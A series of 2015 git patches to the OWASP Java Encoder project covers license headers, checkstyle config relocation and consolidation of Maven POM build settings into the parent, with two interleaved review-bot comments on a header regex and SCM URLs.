SOFTWARE, EVEN IF ADVISED +~ OF THE POSSIBILITY OF SUCH DAMAGE. +--> + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 
@@ -32,10 +52,10 @@ OWASP Encoders - The OWASP Encoders package is a collection of high-performance low-overhead - contextual encoders, that when utilized correctly, is an effective tool in - preventing Web Application security vulnerabilities such as Cross-Site - Scripting. + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. @@ -204,7 +224,6 @@ - diff --git a/esapi/pom.xml b/esapi/pom.xml index 531afbb..dca2527 100644 --- a/esapi/pom.xml +++ b/esapi/pom.xml 
@@ -1,23 +1,43 @@ +~ Copyright (c) 2015 OWASP. +~ All rights reserved. +~ +~ Redistribution and use in source and binary forms, with or without +~ modification, are permitted provided that the following conditions +~ are met: +~ +~ * Redistributions of source code must retain the above +~ copyright notice, this list of conditions and the following +~ disclaimer. +~ +~ * Redistributions in binary form must reproduce the above +~ copyright notice, this list of conditions and the following +~ disclaimer in the documentation and/or other materials +~ provided with the distribution. +~ +~ * Neither the name of the OWASP nor the names of its +~ contributors may be used to endorse or promote products +~ derived from this software without specific prior written +~ permission. +~ +~ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +~ "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +~ LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +~ FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +~ COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +~ INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +~ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +~ SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +~ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +~ STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +~ ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +~ OF THE POSSIBILITY OF SUCH DAMAGE. +--> + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 
@@ -32,10 +52,10 @@ OWASP Encoders ESAPI Thunk - The OWASP Encoders package is a collection of high-performance low-overhead - contextual encoders, that when utilized correctly, is an effective tool in - preventing Web Application security vulnerabilities such as Cross-Site - Scripting. + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. @@ -175,22 +195,22 @@ - - org.owasp.encoder - encoder - 1.2-SNAPSHOT - - - org.owasp.esapi - esapi - [2.0,3) - - - junit - junit - 3.8.1 - test - + + org.owasp.encoder + encoder + 1.2-SNAPSHOT + + + org.owasp.esapi + esapi + [2.0,3) + + + junit + junit + 3.8.1 + test + diff --git a/jsp/pom.xml b/jsp/pom.xml index 5d53304..4ba1bff 100644 --- a/jsp/pom.xml +++ b/jsp/pom.xml 
@@ -1,23 +1,43 @@ +~ Copyright (c) 2015 OWASP. +~ All rights reserved. +~ +~ Redistribution and use in source and binary forms, with or without +~ modification, are permitted provided that the following conditions +~ are met: +~ +~ * Redistributions of source code must retain the above +~ copyright notice, this list of conditions and the following +~ disclaimer. +~ +~ * Redistributions in binary form must reproduce the above +~ copyright notice, this list of conditions and the following +~ disclaimer in the documentation and/or other materials +~ provided with the distribution. +~ +~ * Neither the name of the OWASP nor the names of its +~ contributors may be used to endorse or promote products +~ derived from this software without specific prior written +~ permission. +~ +~ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +~ "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +~ LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +~ FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +~ COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +~ INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +~ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +~ SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +~ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +~ STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +~ ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +~ OF THE POSSIBILITY OF SUCH DAMAGE. +--> + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 
@@ -32,10 +52,10 @@ OWASP Encoders JSP tags and EL functions - The OWASP Encoders package is a collection of high-performance low-overhead - contextual encoders, that when utilized correctly, is an effective tool in - preventing Web Application security vulnerabilities such as Cross-Site - Scripting. + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. diff --git a/pom.xml b/pom.xml index f712f20..dac62c7 100755 --- a/pom.xml +++ b/pom.xml 
@@ -1,23 +1,43 @@ +~ Copyright (c) 2015 OWASP. +~ All rights reserved. +~ +~ Redistribution and use in source and binary forms, with or without +~ modification, are permitted provided that the following conditions +~ are met: +~ +~ * Redistributions of source code must retain the above +~ copyright notice, this list of conditions and the following +~ disclaimer. +~ +~ * Redistributions in binary form must reproduce the above +~ copyright notice, this list of conditions and the following +~ disclaimer in the documentation and/or other materials +~ provided with the distribution. +~ +~ * Neither the name of the OWASP nor the names of its +~ contributors may be used to endorse or promote products +~ derived from this software without specific prior written +~ permission. +~ +~ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +~ "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +~ LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +~ FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +~ COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +~ INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +~ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +~ SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +~ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +~ STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +~ ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +~ OF THE POSSIBILITY OF SUCH DAMAGE. +--> + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 org.owasp.encoder 
@@ -27,10 +47,10 @@ OWASP Encoders Parent - The OWASP Encoders package is a collection of high-performance low-overhead - contextual encoders, that when utilized correctly, is an effective tool in - preventing Web Application security vulnerabilities such as Cross-Site - Scripting. + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. https://www.owasp.org/index.php/OWASP_Java_Encoder_Project @@ -120,7 +140,7 @@ core jsp - esapi + esapi -- cgit v1.2.3 From 874178b6bbf99c48a1a5cc06f8dbc52f71071936 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 07:03:15 -0400 Subject: BSD 3.0 --- COPYING | 66 ++++++++++++++++++++++++++++++++--------------------------------- 1 file changed, 33 insertions(+), 33 deletions(-) diff --git a/COPYING b/COPYING index 51d2e0e..f66c375 100644 --- a/COPYING +++ b/COPYING 
@@ -1,33 +1,33 @@ -// Copyright (c) 2012 Jeff Ichnowski -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without -// modification, are permitted provided that the following conditions -// are met: -// -// * Redistributions of source code must retain the above -// copyright notice, this list of conditions and the following -// disclaimer. -// -// * Redistributions in binary form must reproduce the above -// copyright notice, this list of conditions and the following -// disclaimer in the documentation and/or other materials -// provided with the distribution. -// -// * Neither the name of the OWASP nor the names of its -// contributors may be used to endorse or promote products -// derived from this software without specific prior written -// permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS -// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE -// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, -// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) -// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, -// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED -// OF THE POSSIBILITY OF SUCH DAMAGE. +Copyright (c) 2015 Jeff Ichnowski +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions +are met: + + * Redistributions of source code must retain the above + copyright notice, this list of conditions and the following + disclaimer. 
+ + * Redistributions in binary form must reproduce the above + copyright notice, this list of conditions and the following + disclaimer in the documentation and/or other materials + provided with the distribution. + + * Neither the name of the OWASP nor the names of its + contributors may be used to endorse or promote products + derived from this software without specific prior written + permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file -- cgit v1.2.3 From d1d390b594f4558ad00686df1bf61a7fa12ff785 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 07:08:02 -0400 Subject: moved this to the LICENSE file --- COPYING | 33 --------------------------------- 1 file changed, 33 deletions(-) delete mode 100644 COPYING diff --git a/COPYING b/COPYING deleted file mode 100644 index f66c375..0000000 --- a/COPYING +++ /dev/null 
@@ -1,33 +0,0 @@ -Copyright (c) 2015 Jeff Ichnowski -All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions -are met: - - * Redistributions of source code must retain the above - copyright notice, this list of conditions and the following - disclaimer. - - * Redistributions in binary form must reproduce the above - copyright notice, this list of conditions and the following - disclaimer in the documentation and/or other materials - provided with the distribution. - - * Neither the name of the OWASP nor the names of its - contributors may be used to endorse or promote products - derived from this software without specific prior written - permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS -FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE -COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, -INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) -HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, -STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED -OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file -- cgit v1.2.3 From 29097dd5fcf52fb28b3ae9a37999a75c86026d88 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 09:02:48 -0400 Subject: checkstyle format correction --- core/src/main/java/org/owasp/encoder/Encode.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/core/src/main/java/org/owasp/encoder/Encode.java b/core/src/main/java/org/owasp/encoder/Encode.java index 1ba4984..46003e0 100644 
--- a/core/src/main/java/org/owasp/encoder/Encode.java +++ b/core/src/main/java/org/owasp/encoder/Encode.java @@ -641,7 +641,7 @@ public final class Encode { * @param out where to write encoded output * @param input the input string to encode * @throws IOException if thrown by writer - * + * * @deprecated There is never a need to encode a complete URI with this form of encoding. */ @Deprecated public static void forUri(Writer out, String input) -- cgit v1.2.3 From a9468ee165fc1c3c23328c42fd08618a2e505417 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 09:04:59 -0400 Subject: moved to src/main/config/ --- checkstyle.xml | 202 ---------------------------------- src/main/config/checkstyle-header.txt | 35 ++++++ src/main/config/checkstyle.xml | 202 ++++++++++++++++++++++++++++++++++ 3 files changed, 237 insertions(+), 202 deletions(-) delete mode 100644 checkstyle.xml create mode 100644 src/main/config/checkstyle-header.txt create mode 100644 src/main/config/checkstyle.xml diff --git a/checkstyle.xml b/checkstyle.xml deleted file mode 100644 index 530c5a9..0000000 --- a/checkstyle.xml +++ /dev/null @@ -1,202 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/src/main/config/checkstyle-header.txt b/src/main/config/checkstyle-header.txt new file mode 100644 index 0000000..9a236ed --- /dev/null +++ b/src/main/config/checkstyle-header.txt 
@@ -0,0 +1,35 @@ +^// Copyright \(c\) 201[2-9] (Jeff Ichnowski|Jim Manico|Jeremy Long)\s*$ +^// All rights reserved\.\s*$ +^// +^// Redistribution and use in source and binary forms, with or without\s*$ +^// modification, are permitted provided that the following conditions\s*$ +^// are met:\s*$ +^//\s*$ +^// \* Redistributions of source code must retain the above\s*$ +^// copyright notice, this list of conditions and the following\s*$ +^// disclaimer\.\s*$ +^// +^// \* Redistributions in binary form must reproduce the above\s*$ +^// copyright notice, this list of conditions and the following\s*$ +^// disclaimer in the documentation and/or other materials\s*$ +^// provided with the distribution.\s*$ +^// +^// \* Neither the name of the OWASP nor the names of its\s*$ +^// contributors may be used to endorse or promote products\s*$ +^// derived from this software without specific prior written\s*$ +^// permission\.\s*$ +^// +^// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\s*$ +^// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\s*$ +^// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\s*$ +^// FOR A PARTICULAR PURPOSE ARE DISCLAIMED\. IN NO EVENT SHALL THE\s*$ +^// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\s*$ +^// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\s*$ +^// \(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\s*$ +^// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION\)\s*$ +^// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\s*$ +^// STRICT LIABILITY, OR TORT \(INCLUDING NEGLIGENCE OR OTHERWISE\)\s*$ +^// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED\s*$ +^// OF THE POSSIBILITY OF SUCH DAMAGE\.\s*$ +^\s*$ +^package diff --git a/src/main/config/checkstyle.xml b/src/main/config/checkstyle.xml new file mode 100644 index 0000000..3a2ea7c --- /dev/null +++ b/src/main/config/checkstyle.xml 
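Review bot: The year pattern `201[2-9]` on the first header line only accepts 2012–2019, so a source file carrying a 2020-or-later copyright year, or a range such as `2012-2015`, will fail the header check and need another edit of this file. A form such as `^// Copyright \(c\) 20[1-9][0-9](-20[1-9][0-9])? (Jeff Ichnowski|Jim Manico|Jeremy Long)\s*$` keeps the check working without per-year maintenance. Escaping is also inconsistent: `distribution.` is left unescaped while every other sentence-ending period is written `\.`, and the four bare `^//` lines carry no `\s*$` anchor, so (if the checkstyle header module matches line by line as it appears to) they accept arbitrary trailing text where the neighbouring lines do not.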
@@ -0,0 +1,202 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + -- cgit v1.2.3 From 1a8239a02802a34ec7f28f7d71baccc0fe98a288 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 09:05:31 -0400 Subject: updated ignored list --- .gitignore | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.gitignore b/.gitignore index dbd3596..ae98f63 100644 --- a/.gitignore +++ b/.gitignore @@ -11,4 +11,5 @@ maven-eclipse.xml .externalToolBuilders # Netbeans configuration -nb-configuration.xml \ No newline at end of file +nb-configuration.xml +/target/ \ No newline at end of file -- cgit v1.2.3 From 6b29c00ba6eb3c4b89af0022e2fa006716d3489b Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 09:06:33 -0400 Subject: overhauled pom.xml moving most of the build, dependency-management, etc. to the parent --- core/pom.xml | 193 -------------------------------------- esapi/pom.xml | 180 +---------------------------------- jsp/pom.xml | 181 +---------------------------------- pom.xml | 296 +++++++++++++++++++++++++++++++++++++++++++++++++++++++--- 4 files changed, 290 insertions(+), 560 deletions(-) diff --git a/core/pom.xml b/core/pom.xml index 8ee4d3d..eed4fd7 100644 --- a/core/pom.xml +++ b/core/pom.xml @@ -47,7 +47,6 @@ encoder - 1.2-SNAPSHOT jar OWASP Encoders 
@@ -63,179 +62,14 @@ org.apache.maven.plugins maven-surefire-plugin - 2.12 org/owasp/encoder/BenchmarkTest.java - - - org.codehaus.mojo - cobertura-maven-plugin - 2.5.2 - - - 85 - 85 - false - 85 - 85 - 85 - 85 - - - - - - clean - - - - - - org.apache.maven.plugins - maven-source-plugin - 2.2.1 - - - attach-sources - package - - jar - - - - - - org.apache.maven.plugins - maven-javadoc-plugin - 2.9 - - - attach-javadocs - package - - jar - - - - - - org.apache.maven.plugins - maven-site-plugin - 3.2 - - - - org.apache.maven.plugins - maven-project-info-reports-plugin - 2.6 - - - - index - summary - license - scm - mailing-list - issue-tracking - dependencies - plugin-management - project-team - - - - - - org.codehaus.mojo - versions-maven-plugin - 1.3.1 - - - - dependency-updates-report - plugin-updates-report - - - - - - org.apache.maven.plugins - maven-jxr-plugin - 2.3 - - - org.apache.maven.plugins - maven-surefire-report-plugin - 2.12.4 - - - - report-only - failsafe-report-only - - - - - - org.codehaus.mojo - cobertura-maven-plugin - 2.5.1 - - - org.apache.maven.plugins - maven-pmd-plugin - 2.7.1 - - 1.5 - true - utf-8 - - - - org.apache.maven.plugins - maven-javadoc-plugin - 2.9 - - - default - - javadoc - - - - - - org.apache.maven.plugins - maven-checkstyle-plugin - 2.9.1 - - ../checkstyle.xml - basedir=${basedir}/.. - - - - org.codehaus.mojo - findbugs-maven-plugin - 2.5.2 - - - - - - - - junit - junit - 3.8.1 - test - - - benchmark @@ -244,7 +78,6 @@ org.apache.maven.plugins maven-failsafe-plugin - 2.12.4 org/owasp/encoder/BenchmarkTest.java @@ -262,31 +95,5 @@ - - sign-artifacts - - - performRelease - true - - - - - - org.apache.maven.plugins - maven-gpg-plugin - - - sign-artifacts - verify - - sign - - - - - - - diff --git a/esapi/pom.xml b/esapi/pom.xml index dca2527..28118fe 100644 --- a/esapi/pom.xml +++ b/esapi/pom.xml 
@@ -47,198 +47,24 @@ encoder-esapi - 1.2-SNAPSHOT jar OWASP Encoders ESAPI Thunk - The OWASP Encoders package is a collection of high-performance low-overhead - contextual encoders, that when utilized correctly, is an effective tool in - preventing Web Application security vulnerabilities such as Cross-Site - Scripting. + The OWASP Encoders ESAPI Thunk provides an easy way to plugin the Encoder + Projects API into an implementation of ESAPI. - - - - org.apache.maven.plugins - maven-surefire-plugin - 2.12 - - - - org.codehaus.mojo - cobertura-maven-plugin - 2.5.2 - - - 85 - 85 - false - 85 - 85 - 85 - 85 - - - - - - clean - - - - - - org.apache.maven.plugins - maven-site-plugin - 3.2 - - - - org.apache.maven.plugins - maven-project-info-reports-plugin - 2.6 - - - - index - summary - license - scm - mailing-list - issue-tracking - dependencies - plugin-management - project-team - - - - - - org.codehaus.mojo - versions-maven-plugin - 1.3.1 - - - - dependency-updates-report - plugin-updates-report - - - - - - org.apache.maven.plugins - maven-jxr-plugin - 2.3 - - - org.apache.maven.plugins - maven-surefire-report-plugin - 2.12.4 - - - - report-only - failsafe-report-only - - - - - - org.codehaus.mojo - cobertura-maven-plugin - 2.5.1 - - - org.apache.maven.plugins - maven-pmd-plugin - 2.7.1 - - 1.5 - true - utf-8 - - - - org.apache.maven.plugins - maven-javadoc-plugin - 2.9 - - - default - - javadoc - - - - - - org.apache.maven.plugins - maven-checkstyle-plugin - 2.9.1 - - ../checkstyle.xml - basedir=${basedir}/.. - - - - org.codehaus.mojo - findbugs-maven-plugin - 2.5.2 - - - - - - - org.owasp.encoder encoder - 1.2-SNAPSHOT + ${project.parent.version} org.owasp.esapi esapi [2.0,3) - - junit - junit - 3.8.1 - test - - - - - sign-artifacts - - - performRelease - true - - - - - - org.apache.maven.plugins - maven-gpg-plugin - - - sign-artifacts - verify - - sign - - - - - - - - diff --git a/jsp/pom.xml b/jsp/pom.xml index 4ba1bff..383bc6a 100644 --- a/jsp/pom.xml 
+++ b/jsp/pom.xml @@ -47,164 +47,20 @@ encoder-jsp - 1.2-SNAPSHOT jar OWASP Encoders JSP tags and EL functions - The OWASP Encoders package is a collection of high-performance low-overhead - contextual encoders, that when utilized correctly, is an effective tool in - preventing Web Application security vulnerabilities such as Cross-Site - Scripting. + The OWASP Encoder JSP package contains JSP tag definitions and TLDs to allow + easy use of the OWASP Encoder Project's core API. The TLDs contain both tag + definitions and JSP EL functions. - - - - org.apache.maven.plugins - maven-surefire-plugin - 2.12 - - - - org.codehaus.mojo - cobertura-maven-plugin - 2.5.2 - - - 85 - 85 - false - 85 - 85 - 85 - 85 - - - - - - clean - - - - - - org.apache.maven.plugins - maven-site-plugin - 3.2 - - - - org.apache.maven.plugins - maven-project-info-reports-plugin - 2.6 - - - - index - summary - license - scm - mailing-list - issue-tracking - dependencies - plugin-management - project-team - - - - - - org.codehaus.mojo - versions-maven-plugin - 1.3.1 - - - - dependency-updates-report - plugin-updates-report - - - - - - org.apache.maven.plugins - maven-jxr-plugin - 2.3 - - - org.apache.maven.plugins - maven-surefire-report-plugin - 2.12.4 - - - - report-only - failsafe-report-only - - - - - - org.codehaus.mojo - cobertura-maven-plugin - 2.5.1 - - - org.apache.maven.plugins - maven-pmd-plugin - 2.7.1 - - 1.5 - true - utf-8 - - - - org.apache.maven.plugins - maven-javadoc-plugin - 2.9 - - - default - - javadoc - - - - - - org.apache.maven.plugins - maven-checkstyle-plugin - 2.9.1 - - ../checkstyle.xml - basedir=${basedir}/.. - - - - org.codehaus.mojo - findbugs-maven-plugin - 2.5.2 - - - - - - - org.owasp.encoder encoder - 1.2-SNAPSHOT - - - junit - junit - 3.8.1 - test + ${project.parent.version} javax.servlet.jsp 
@@ -231,33 +87,4 @@ test - - - - sign-artifacts - - - performRelease - true - - - - - - org.apache.maven.plugins - maven-gpg-plugin - - - sign-artifacts - verify - - sign - - - - - - - - diff --git a/pom.xml b/pom.xml index dac62c7..52c7938 100755 --- a/pom.xml +++ b/pom.xml @@ -53,6 +53,12 @@ Scripting. + + core + jsp + esapi + + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project 2011 @@ -71,13 +77,13 @@ org.sonatype.oss oss-parent - 7 + 9 - scm:svn:https://owasp-java-encoder.googlecode.com/svn/trunk/ - scm:svn:http://owasp-java-encoder.googlecode.com/svn/trunk/ - http://code.google.com/p/owasp-java-encoder/source/browse/ + scm:git:git@github.com:jmanico/owasp-java-encoder.git + scm:git:git@github.com:jmanico/owasp-java-encoder.git + https://github.com/jmanico/owasp-java-encoder @@ -91,8 +97,8 @@ - Google Code - http://code.google.com/p/owasp-java-encoder/issues/list + github + https://github.com/jmanico/owasp-java-encoder/issues 
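Review bot: Both SCM entries now use the SSH form `scm:git:git@github.com:jmanico/owasp-java-encoder.git`, and since the two replaced values were the former `https` and `http` SVN URLs they appear to be the `connection` and `developerConnection` elements (the tag names are not rendered in this view). If the first is `<connection>`, it should stay an anonymous read-only URL, `scm:git:https://github.com/jmanico/owasp-java-encoder.git`, so that release, site and SCM tooling run from a CI host without an SSH deploy key can still check out the project; the SSH form belongs only in `developerConnection`.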
@@ -121,26 +127,290 @@ UTF-8 + UTF-8 + + + + junit + junit + 3.8.2 + + + + + + junit + junit + test + + + + + + org.apache.maven.plugins + maven-compiler-plugin + 3.2 + + + org.apache.maven.plugins + maven-jar-plugin + 2.5 + + + org.apache.maven.plugins + maven-source-plugin + 2.4 + + + org.apache.maven.plugins + maven-javadoc-plugin + 2.10.1 + + + org.codehaus.mojo + cobertura-maven-plugin + 2.7 + + + org.apache.maven.plugins + maven-failsafe-plugin + 2.18.1 + + + org.apache.maven.plugins + maven-surefire-plugin + 2.18.1 + + + org.apache.maven.plugins + maven-surefire-report-plugin + 2.18.1 + + + org.apache.maven.plugins + maven-gpg-plugin + 1.6 + + + org.apache.maven.plugins + maven-site-plugin + 3.4 + + + org.apache.maven.plugins + maven-project-info-reports-plugin + 2.8 + + + org.apache.maven.plugins + maven-pmd-plugin + 3.4 + + + org.codehaus.mojo + versions-maven-plugin + 2.1 + + + org.apache.maven.plugins + maven-jxr-plugin + 2.5 + + + org.codehaus.mojo + findbugs-maven-plugin + 3.0.0 + + + + org.apache.maven.plugins maven-compiler-plugin - 3.0 1.5 1.5 + + org.codehaus.mojo + cobertura-maven-plugin + + + 85 + 85 + false + 85 + 85 + 85 + 85 + + + + + + clean + + + + + + org.apache.maven.plugins + maven-surefire-plugin + + + org/owasp/encoder/BenchmarkTest.java + + + + + org.apache.maven.plugins + maven-source-plugin + + + attach-sources + package + + jar + + + + + + org.apache.maven.plugins + maven-javadoc-plugin + + + attach-javadocs + package + + jar + + + + - - - core - jsp - esapi - + + + + org.apache.maven.plugins + maven-project-info-reports-plugin + + + + index + summary + license + scm + mailing-list + issue-tracking + dependencies + plugin-management + project-team + + + + + + org.codehaus.mojo + versions-maven-plugin + + + + dependency-updates-report + plugin-updates-report + + + + + + org.apache.maven.plugins + maven-jxr-plugin + + + org.apache.maven.plugins + maven-surefire-report-plugin + + + + report-only + failsafe-report-only + + + + + + 
